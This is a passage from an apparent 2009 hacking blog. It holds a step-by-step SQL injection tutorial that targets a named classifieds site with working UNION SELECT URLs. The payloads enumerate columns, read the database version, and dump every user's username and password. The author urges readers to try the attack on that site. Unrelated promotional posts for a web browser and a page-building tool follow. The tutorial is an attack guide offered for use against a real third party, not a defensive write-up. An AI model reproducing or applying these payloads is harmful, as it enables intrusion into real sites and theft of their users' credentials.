but thats not all. You need to add some characters at the end, which tell the database that it is a query, and not you trying to connect to another page of the site. To do this, you use one of the following" -- " or " /* " these denote that the text is a comment. These are used in programming when you need to write yourself something to remember inside your code, or script.
it dosent matter what it is for, if you dont understand, you just need to know when to use it.
so add either -- or /* to the end of your url
(there are two different methods, because some servers block one of the methods, so if one of the comment symbols* -- * or * /* * dont work, try the other one. i personally prefer -- its faster the url is now:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1-- OR http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*
make sure not to leave a space between your 1 and your -- or /* now the first time, it is not going to work obviously. To find out the number of columns, you need to increase the number "1" by 1 every time you try
so the first time you would make the url:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*
second time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 2/*
third time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 3/*
and so on and so on, untill you encounter ANOTHER error. It should say something about mysql. now you know the number of coloums. Lets say it took you 5 tires, on the fifth try, there was an error, then you have 4 columns, because the 5th try is an error, that means the column does not exist in this table (a table located inside the database) now, you have the amount of columns, which is great.
Now we have to use the UNION function, which allows you to select more data within one sql statment. The statment in this case being what you add to the end of the url(hope your not lost) Now when we use the union function, the syntax (how we use it, where we use it) is like so:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select
but we want it to look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2/*
what this does is select the columns in the table, column 1,2,3 and column 4
now of course, you only want to select the number of columns that you have determined exist. In my example, i determined 4. Therefore, i selected column 1,2,3 and 4.
to tell if this command is working, look for numbers on the webpage, that werent there before. The numbers could be 1 or any number up to the amount of columns you found. So if there were 8 columns, the new number could be anywhere from 1-8.
Now you need to check for the mysql version. This is important, because if it is version 5, you job will be ALOT esier
now this part is sometimes tricky. Look to find the new number that appeared. Now, in your url
which should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union select all 1,2/*
you need to replace the number in the url that matches the number that appeared on the web page (so if the number that appeared is 2, then you replace the 2 in "union select all 1,2/*"
what you replace it with is:
@@version or version() if @@version yeilded no results
. we should get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,@@version/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." what we need is convert() function
i.e. http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,convert(@@version using latin1)/*
(yeah, im confused too, dont worry, you might not have to use this) or with hex() and unhex()
i.e. http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,unhex(hex(@@version))/*
and you will get the MySQL version The numbers telling you the version will appear on the web page, most lilkey where the other number appeared.
Now, one of the hardest parts, you need to find out the name of the table in which you wish to see the information of. Be it the table that stores passwords, or usernames, or both. you need to find out. This part can come down to guessing. But remember, always make an educated guess. Dont guess something random like spongepurple guess something like password or pswrd or user_name or user_names, you catch my drift? so in order to guess the name, use a syntax like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from randomguess/*
on this site, i know for a fact, that the user name table is
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from std_users/*
std means standard
now, you should get MORE numbers. But what do you do with them? you need to extract (put the data into a readable format) the data. To do this, you need the column name. On this site, and on lots more sites, you can get a rough idea of what the column name is by reading the source of the webpage. The source, is the coding. you can read this by right clicking on the page and hit "Veiw Source Code". Now you need to find the register coding to do this you might have to open up a new internet clien (have to internets running at once) or on firefox, another tab. On your second internet, go to the "Creat account" page and veiw the source on This website, www.buysellusa.com the code is as follows:
Password:
here we can clearly see the words "new_user_name" and "password1" from "new_user_name" im going to keep "User_name" because that seems logical
now to see if im right, i will need to check
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*
notice where i put "user_name" i put it inbetween the two columns, column 1 and column 2. Then i made sure to state WHERE i am selecting this data (from the column named "user_name") from, the std_users table. and VIOLA! you have every single account user name registered on the site. But now, we need the password.
now before, when we looked at the source code, we saw two interesting things, "New_user_name" and "password1" now we need the "password1"
i will get rid of the one, because why would the column name have a 1 in it? so basicially, you do the same thing that you did with the user names.
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*
but instead of that, its:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,password,2 from std_users/*
and ONCE AGAIN! VIOLA! you now have the password to each and every account on the site.
but the lesson is not over, now, to make it easier, we will reformat your results, so they can be better read.
to do this, simply use the contact function.
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,concat(user_name,0x3a,password),2 from std_users/*
what this does, in a sense, is contact thoes columns from the chart you specify (in this case std_users) and displays there information, but, now, you can display them both at the same time, because they are being simotaneously contacted. And, in this context, it syncronizez the username to its password like so:
usernameassword
he 0x3a is just a hex code, it is equal to a colon, so your results will look nice.
and thats all.
If you have done this right, you should have just hacked a site.
for your first time, try on www.buysellusa.net its easy :P on www.buysellusa.net, make sure to use /* comment symbol!
please comment on anything i explained wrong, or didnt explain enough... after all, i am new at this Thanks to S0vv and p3ri0d for their help
Tuesday, December 29, 2009
Speedy Web Browser.
MAXTHON BROWSER
This is an Full Featured Browser. This is very Easy to use and it was download 200 million by worldwide. U can Swap, add, move, remove, and change Maxthon's tool bars, icons, menus, colors, skins, and layouts until it looks the way you would have designed it. The built-in Ad Hunter blocks harmful, or just irritating ads, images and pages. All over u can find more and more utilities from maxthon. For Download Click here.
key feature:
Maxthon Smart Acceleration
Boost the browsing speed of your frequent visit websites.
And the Super Acceleration Mode can improve your browse speed even more.
Anti-Freeze
The emergence of Tabbed Browsing Mode and the increasing usage of Ajax Technology in websites might cause frequent freezing while browsing.
Maxthon Browser has developed a new technology to solve this problem, makes your surfing more fluent.
Maxthon Browser has developed a new technology to solve this problem, makes your surfing more fluent.
How to Create a Website Full Free?
WEB PAGE MAKER
Today I will Introduce a software Name WEB PAGE MAKER. This is very Effectively and Quick software for designing a website with the minimum knowledge. You can use it as wish as. Web Page Maker is an easy-to-use web page editor that allows you to create and upload web pages in minutes without knowing HTML. Simply drag and drop objects onto the page and position them freely in the layout. It comes with some pre-designed templates that help you to get started. It also includes ready-to-use navigation bars that can be inserted into the page. Additional features include built-in color picker, Java script library, image library and built-in FTP client.
Key Feature:
No html coding is required and do not need any web experience. You can use CSS style sheet to control how the text appears on your site. Hundreds of functions: photo gallery, rollover image, flash slide show, audio/video, flash video, ready-to-use Java Script effects, tables, forms, iFrames and much more...
Subscribe to:
Posts (Atom)